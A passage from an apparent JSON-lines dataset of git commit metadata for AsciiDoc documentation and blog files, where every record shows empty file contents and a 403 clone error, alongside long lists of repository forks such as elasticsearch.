scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,a2lin\/elasticsearch,markwalkom\/elasticsearch,henakamaMSFT\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,C-Bish\/elasticsearch,IanvsPoplicola\/elasticsearch,glefloch\/elasticsearch,LeoYao\/elasticsearch,Shepard1212\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,obourgain\/elasticsearch,jimczi\/elasticsearch,artnowo\/elasticsearch,markwalkom\/elasticsearch,artnowo\/elasticsearch,i-am-Nathan\/elasticsearch,scorpionvicky\/elasticsearch,rlugojr\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,rlugojr\/elasticsearch,Stacey-Gammon\/elasticsearch,bawse\/elasticsearch,jprante\/elasticsea
rch,naveenhooda2000\/elasticsearch,qwerty4030\/elasticsearch,jprante\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nilabhsagar\/elasticsearch,nknize\/elasticsearch,nilabhsagar\/elasticsearch,geidies\/elasticsearch,MisterAndersen\/elasticsearch,strapdata\/elassandra,JackyMai\/elasticsearch,pozhidaevak\/elasticsearch,geidies\/elasticsearch,Shepard1212\/elasticsearch,vroyer\/elassandra,elasticdog\/elasticsearch,elasticdog\/elasticsearch,scottsom\/elasticsearch,bawse\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,uschindler\/elasticsearch,JackyMai\/elasticsearch,Stacey-Gammon\/elasticsearch,elasticdog\/elasticsearch,coding0011\/elasticsearch,vroyer\/elassandra,bawse\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,sneivandt\/elasticsearch,coding0011\/elasticsearch,fernandozhu\/elasticsearch,MisterAndersen\/elasticsearch,geidies\/elasticsearch,wangtuo\/elasticsearch,JSCooke\/elasticsearch,shreejay\/elasticsearch,i-am-Nathan\/elasticsearch,s1monw\/elasticsearch,henakamaMSFT\/elasticsearch,bawse\/elasticsearch,HonzaKral\/elasticsearch,maddin2016\/elasticsearch,winstonewert\/elasticsearch,uschindler\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,StefanGor\/elasticsearch,alexshadow007\/elasticsearch,Helen-Zhao\/elasticsearch,mjason3\/elasticsearch,mortonsykes\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,henakamaMSFT\/elasticsearch,winstonewert\/elasticsearch,shreejay\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,IanvsPoplicola\/elasticsearch,jprante\/elasticsearch,C-Bish\/elasticsearch,lks21c\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,rlugojr\/elasticsearch,MisterAndersen\/elasticsearch,coding0011\/elasticsearch,ZTE-PaaS\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,henakamaMSFT\/elasticsearch,jprante\/elasticsearch,strapdata\/elassandra,naveenhooda2000\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,a2lin\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,C-Bish\/elasticsearch,Helen-Zhao\/elasticsearch,njlawton\/elasticsearch,JSCooke\/elasticsearch,markwalkom\/elasticsearch,artnowo\/elasticsearch,vroyer\/elasticassandra,jprante\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,MisterAndersen\/elasticsearch,qwerty4030\/elasticsearch,wuranbo\/elasticsearch,wuranbo\/elasticsearch,jimczi\/elasticsearch,MisterAndersen\/elasticsearch,fred84\/elasticsearch,brandonkearby\/elasticsearch,obourgain\/elasticsearch,geidies\/elasticsearch,JSCooke\/elasticsearch,pozhidaevak\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,geidies\/elasticsearch,mikemccand\/elasticsearch,nazarewk\/elasticsearch,masaruh\/elasticsearch,jimczi\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,mortonsykes\/elasticsearch,ZTE-PaaS\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,winstonewert\/elasticsearch,obourgain\/e
lasticsearch,artnowo\/elasticsearch,mortonsykes\/elasticsearch,robin13\/elasticsearch,StefanGor\/elasticsearch,fernandozhu\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,nezirus\/elasticsearch,Shepard1212\/elasticsearch,LewayneNaidoo\/elasticsearch,mortonsykes\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,mikemccand\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,C-Bish\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,vroyer\/elassandra,fernandozhu\/elasticsearch,nazarewk\/elasticsearch,nknize\/elasticsearch,nazarewk\/elasticsearch,njlawton\/elasticsearch,umeshdangat\/elasticsearch,njlawton\/elasticsearch,nilabhsagar\/elasticsearch,nknize\/elasticsearch,glefloch\/elasticsearch,brandonkearby\/elasticsearch,LewayneNaidoo\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,gingerwizard\/elasticsearch,rlugojr\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,njlawton\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,winstonewert\/elasticsearch,LewayneNaidoo\/elasticsearch","old_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b6d0a9427604b599f56168a3e1b0daa265c03d5","subject":"Add first run of intro to higher order functions guide","message":"Add first run of intro to higher order functions guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/higher-order-functions.adoc","new_file":"content\/guides\/higher-order-functions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a4450064fd64ef93b69d18b15d78e7807e07459d","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30dc984ceb816f6ee6bfe3d849bc4953ca81e199","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e2ce3b9ba96fa9fb7d69e3c1f756c6c497a8c624","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c1c1c442519295cf4fb2c5292e52a67b4cf1e28","subject":"Added FAQ regarding java 8 types","message":"Added FAQ regarding java 8 types\n\nfixes #914\n","repos":"zhiqinghuang\/springfox,vmarusic\/springfox,jlstrater\/springfox,acourtneybrown\/springfox,vmarusic\/springfox,springfox\/springfox,RobWin\/springfox,erikthered\/springfox,zorosteven\/springfox,namkee\/springfox,springfox\/springfox,erikthered\/springfox,kevinconaway\/springfox,acourtneybrown\/springfox,zhiqinghuang\/springfox,yelhouti\/springfox,springfox\/springfox,arshadalisoomro\/springfox,wjc133\/springfox,RobWin\/springfox,arshadalisoomro\/springfox,thomsonreuters\/springfox,acourtneybrown\/springfox,erikthered\/springfox,maksimu\/springfox,yelhouti\/springfox,arshadalisoomro\/springfox,kevinconaway\/springfox,springfox\/springfox,namkee\/springfox,wjc133\/springfox,maksimu\/springfox,maksimu\/springfox,cbornet\/springfox,thomsonreuters\/springfox,zorosteven\/springfox,wjc133\/springfox,namkee\/springfox,vmarusic\/springfox,jlstrater\/springfox,jlstrater\/springfox,cbornet\/springfox,kevinconaway\/springfox,yelhouti\/springfox,RobWin\/springfox,zorosteven\/springfox,cbornet\/springfox,zhiqinghuang\/springfox,thomsonreuters\/springfox","old_file":"asciidoc\/common-problems.adoc","new_file":"asciidoc\/common-problems.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/springfox\/springfox.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a0a050699c07d7a0c8880b3ef4f491c9609dc41","subject":"Update 2015-07-16-Buying-A-Car.adoc","message":"Update 2015-07-16-Buying-A-Car.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-16-Buying-A-Car.adoc","new_file":"_posts\/2015-07-16-Buying-A-Car.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c48eb9df126c65a557a54cd98f504b24933c5482","subject":"Update 2016-11-22-Sweet-Potato.adoc","message":"Update 2016-11-22-Sweet-Potato.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2df2ba0ca94569891b57148ac0cb5dd3a328c56c","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 
2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9490c25e16fcfbae105382f55e853d3ec93a371","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7afddae384e8cc7e86e25fb7a9b983aa9ac92eb5","subject":"Deleted 2016-6-25-Git-one.adoc","message":"Deleted 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9230d9923ea3d0d80d18f4e27f179245c0d80dad","subject":"SWARM-1822: Add note about elytron audit log (#781)","message":"SWARM-1822: Add note about elytron audit log (#781)\n\n","repos":"wildfly-swarm\/wildfly-swarm,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,juangon\/wildfly-swarm","old_file":"docs\/reference\/elytron.adoc","new_file":"docs\/reference\/elytron.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ecd51dbf0365014e350cb79fffc1313f80ddcdb5","subject":"Slime interrupt","message":"Slime interrupt\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d53b055692b3755de8dac2bf79b577e5bf2c724e","subject":"Forge 3.0.1.Final","message":"Forge 
3.0.1.Final\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-03-16-forge-3.0.1.final.asciidoc","new_file":"news\/2016-03-16-forge-3.0.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"88bf982a035c3fc029c8849f47ede481a4fa4f9d","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4a5c4f941281f2ec375979b206f1a4c78dc7638","subject":"release notes: ipv6 latency","message":"release notes: ipv6 latency\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f990fed0a0e5c7df98f6e4c42acb6e534f73045","subject":"Update 2015-05-24-ushidu2015.adoc","message":"Update 2015-05-24-ushidu2015.adoc","repos":"diodario\/hubpress.io,diodario\/hubpress.io,diodario\/hubpress.io","old_file":"_posts\/2015-05-24-ushidu2015.adoc","new_file":"_posts\/2015-05-24-ushidu2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diodario\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86361ce9390bab304e8aca4099a25f3778c6cae2","subject":"Update 2015-06-08-My-title-4.adoc","message":"Update 2015-06-08-My-title-4.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-08-My-title-4.adoc","new_file":"_posts\/2015-06-08-My-title-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5d887d9db28b1d2f00b0ebf2ff161ed9500f299","subject":"spring initializer","message":"spring initializer","repos":"mygithubwork\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works","old_file":"init.adoc","new_file":"init.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"826c022c5b8761917e7272a85ceb66cafe5b9a4d","subject":"0.10.0.Beta4 release announcement","message":"0.10.0.Beta4 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-08-20-debezium-0-10-0-beta4-released.adoc","new_file":"blog\/2019-08-20-debezium-0-10-0-beta4-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"261547309c2c19befeb3225c1a53203dfd67a2e4","subject":"added Readme for Dockerfile explanation (#38)","message":"added Readme for Dockerfile explanation (#38)\n\n","repos":"droolsjbpm\/drools-website,droolsjbpm\/drools-website,droolsjbpm\/drools-website","old_file":"_dockerPublisher\/ReadMe_automaticPublishing.adoc","new_file":"_dockerPublisher\/ReadMe_automaticPublishing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/drools-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab6d4c6886b2b3b4ca5da073d99c86344e0eb098","subject":"y2b create post Build Your Own Headphones!","message":"y2b create post Build Your Own Headphones!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-05-09-Build-Your-Own-Headphones.adoc","new_file":"_posts\/2015-05-09-Build-Your-Own-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"267c4a484fac341f56d34c71fce4f36279d5905d","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a75d33ee6dd3cbab95b08648814eba6089ba2ba","subject":"Remove migration note about cat verbosity","message":"Remove migration note about cat verbosity\n\nIts no longer 
true.\n","repos":"strapdata\/elassandra,trangvh\/elasticsearch,nezirus\/elasticsearch,pablocastro\/elasticsearch,GlenRSmith\/elasticsearch,yynil\/elasticsearch,truemped\/elasticsearch,kalburgimanjunath\/elasticsearch,slavau\/elasticsearch,springning\/elasticsearch,hydro2k\/elasticsearch,F0lha\/elasticsearch,rento19962\/elasticsearch,hafkensite\/elasticsearch,xuzha\/elasticsearch,mm0\/elasticsearch,henakamaMSFT\/elasticsearch,mm0\/elasticsearch,yanjunh\/elasticsearch,tkssharma\/elasticsearch,socialrank\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,springning\/elasticsearch,beiske\/elasticsearch,apepper\/elasticsearch,ivansun1010\/elasticsearch,queirozfcom\/elasticsearch,Charlesdong\/elasticsearch,strapdata\/elassandra5-rc,vingupta3\/elasticsearch,yanjunh\/elasticsearch,gingerwizard\/elasticsearch,xuzha\/elasticsearch,gingerwizard\/elasticsearch,wbowling\/elasticsearch,mortonsykes\/elasticsearch,andrestc\/elasticsearch,nellicus\/elasticsearch,sc0ttkclark\/elasticsearch,fred84\/elasticsearch,fforbeck\/elasticsearch,rento19962\/elasticsearch,fernandozhu\/elasticsearch,Brijeshrpatel9\/elasticsearch,mikemccand\/elasticsearch,gfyoung\/elasticsearch,wimvds\/elasticsearch,apepper\/elasticsearch,nilabhsagar\/elasticsearch,JackyMai\/elasticsearch,spiegela\/elasticsearch,areek\/elasticsearch,knight1128\/elasticsearch,JervyShi\/elasticsearch,tebriel\/elasticsearch,Rygbee\/elasticsearch,HonzaKral\/elasticsearch,ulkas\/elasticsearch,MaineC\/elasticsearch,shreejay\/elasticsearch,truemped\/elasticsearch,onegambler\/elasticsearch,episerver\/elasticsearch,lks21c\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,drewr\/elasticsearch,mohit\/elasticsearch,diendt\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,ImpressTV\/elasticsearch,Ansh90\/elasticsearch,sdauletau\/elasticsearch,wangtuo\/elasticsearch,PhaedrusTheGreek\/elasticsearch,wenpos\/elasticsearch,jbertouch\/elasticsearch,elancom\/elasticsearch,kenshin233\/elasticsearch,djschny\/elasticsearch,mbrukman\/elasticsearch,himanshuag\/elasticsearch,nilabhsagar\/elasticsearch,pablocastro\/elasticsearch,liweinan0423\/elasticsearch,kaneshin\/elasticsearch,palecur\/elasticsearch,mapr\/elasticsearch,schonfeld\/elasticsearch,tebriel\/elasticsearch,ouyangkongtong\/elasticsearch,nilabhsagar\/elasticsearch,kaneshin\/elasticsearch,achow\/elasticsearch,mgalushka\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,socialrank\/elasticsearch,spiegela\/elasticsearch,achow\/elasticsearch,iacdingping\/elasticsearch,fred84\/elasticsearch,martinstuga\/elasticsearch,ulkas\/elasticsearch,sc0ttkclark\/elasticsearch,yongminxia\/elasticsearch,JackyMai\/elasticsearch,s1monw\/elasticsearch,knight1128\/elasticsearch,pranavraman\/elasticsearch,LewayneNaidoo\/elasticsearch,dongjoon-hyun\/elasticsearch,Helen-Zhao\/elasticsearch,geidies\/elasticsearch,kunallimaye\/elasticsearch,cnfire\/elasticsearch-1,s1monw\/elasticsearch,drewr\/elasticsearch,drewr\/elasticsearch,davidvgalbraith\/elasticsearch,umeshdangat\/elasticsearch,cnfire\/elasticsearch-1,huanzhong\/elasticsearch,lmtwga\/elasticsearch,wittyameta\/elasticsearch,njlawton\/elasticsearch,YosuaMichael\/elasticsearch,clintongormley\/elasticsearch,davidvgalbraith\/elasticsearch,socialrank\/elasticsearch,mm0\/elasticsearch,martinstuga\/elasticsearch,himanshuag\/elasticsearch,yongminxia\/elasticsearch,adrianbk\/elasticsearch,markwalkom\/elasticsearch,F0lha\/elasticsearch,markharwood\/elasticsearch,vingupta3\/elasticsearch,knight1128\/elasticsearch,tahaemin\/elasticsearch,vroyer\/elassandra,PhaedrusTheGreek\/elasticsearc
h,mortonsykes\/elasticsearch,Collaborne\/elasticsearch,camilojd\/elasticsearch,maddin2016\/elasticsearch,jprante\/elasticsearch,mbrukman\/elasticsearch,jchampion\/elasticsearch,Collaborne\/elasticsearch,elasticdog\/elasticsearch,KimTaehee\/elasticsearch,franklanganke\/elasticsearch,ZTE-PaaS\/elasticsearch,uschindler\/elasticsearch,mapr\/elasticsearch,ricardocerq\/elasticsearch,ckclark\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,rlugojr\/elasticsearch,strapdata\/elassandra-test,iacdingping\/elasticsearch,apepper\/elasticsearch,schonfeld\/elasticsearch,liweinan0423\/elasticsearch,drewr\/elasticsearch,markharwood\/elasticsearch,queirozfcom\/elasticsearch,JSCooke\/elasticsearch,rajanm\/elasticsearch,KimTaehee\/elasticsearch,snikch\/elasticsearch,zhiqinghuang\/elasticsearch,mjason3\/elasticsearch,PhaedrusTheGreek\/elasticsearch,pritishppai\/elasticsearch,xingguang2013\/elasticsearch,slavau\/elasticsearch,henakamaMSFT\/elasticsearch,fforbeck\/elasticsearch,karthikjaps\/elasticsearch,naveenhooda2000\/elasticsearch,yongminxia\/elasticsearch,girirajsharma\/elasticsearch,a2lin\/elasticsearch,myelin\/elasticsearch,kalimatas\/elasticsearch,camilojd\/elasticsearch,andrestc\/elasticsearch,jango2015\/elasticsearch,MichaelLiZhou\/elasticsearch,mmaracic\/elasticsearch,mbrukman\/elasticsearch,sdauletau\/elasticsearch,zhiqinghuang\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,iamjakob\/elasticsearch,qwerty4030\/elasticsearch,lydonchandra\/elasticsearch,strapdata\/elassandra,F0lha\/elasticsearch,alexshadow007\/elasticsearch,strapdata\/elassandra5-rc,scorpionvicky\/elasticsearch,ckclark\/elasticsearch,artnowo\/elasticsearch,kenshin233\/elasticsearch,jchampion\/elasticsearch,girirajsharma\/elasticsearch,pritishppai\/elasticsearch,YosuaMichael\/elasticsearch,dongjoon-hyun\/elasticsearch,maddin2016\/elasticsearch,C-Bish\/elasticsearch,wittyameta\/elasticsearch,dpursehouse\/elasticsearch,Stacey-Gammon\/elasticsearch,weipinghe\/elasticsearch,brandonkearby\/elasticsearch,ivansun1010\/elasticsearch,ZTE-PaaS\/elasticsearch,hafkensite\/elasticsearch,wittyameta\/elasticsearch,elancom\/elasticsearch,achow\/elasticsearch,Ansh90\/elasticsearch,brandonkearby\/elasticsearch,clintongormley\/elasticsearch,xuzha\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,njlawton\/elasticsearch,fernandozhu\/elasticsearch,lmtwga\/elasticsearch,mjason3\/elasticsearch,clintongormley\/elasticsearch,strapdata\/elassandra5-rc,dpursehouse\/elasticsearch,MichaelLiZhou\/elasticsearch,mmaracic\/elasticsearch,StefanGor\/elasticsearch,Stacey-Gammon\/elasticsearch,Siddartha07\/elasticsearch,JervyShi\/elasticsearch,jimhooker2002\/elasticsearch,ESamir\/elasticsearch,kalimatas\/elasticsearch,palecur\/elasticsearch,mikemccand\/elasticsearch,PhaedrusTheGreek\/elasticsearch,lzo\/elasticsearch-1,diendt\/elasticsearch,markharwood\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,sposam\/elasticsearch,episerver\/elasticsearch,markwalkom\/elasticsearch,awislowski\/elasticsearch,slavau\/elasticsearch,jbertouch\/elasticsearch,tkssharma\/elasticsearch,apepper\/elasticsearch,JervyShi\/elasticsearch,naveenhooda2000\/elasticsearch,polyfractal\/elasticsearch,mohit\/elasticsearch,ckclark\/elasticsearch,wangtuo\/elasticsearch,tahaemin\/elasticsearch,ulkas\/elasticsearch,jeteve\/elasticsearch,jango2015\/elasticsearch,mortonsykes\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra-test,iamjakob\/elasticsearch,wenpos\/elasticsearch,maddin2016\/elasticsearch,kenshin233\/elasticsearch,masterweb121\/elasticsearch,andrejserafim\/elasticsearch,vroy
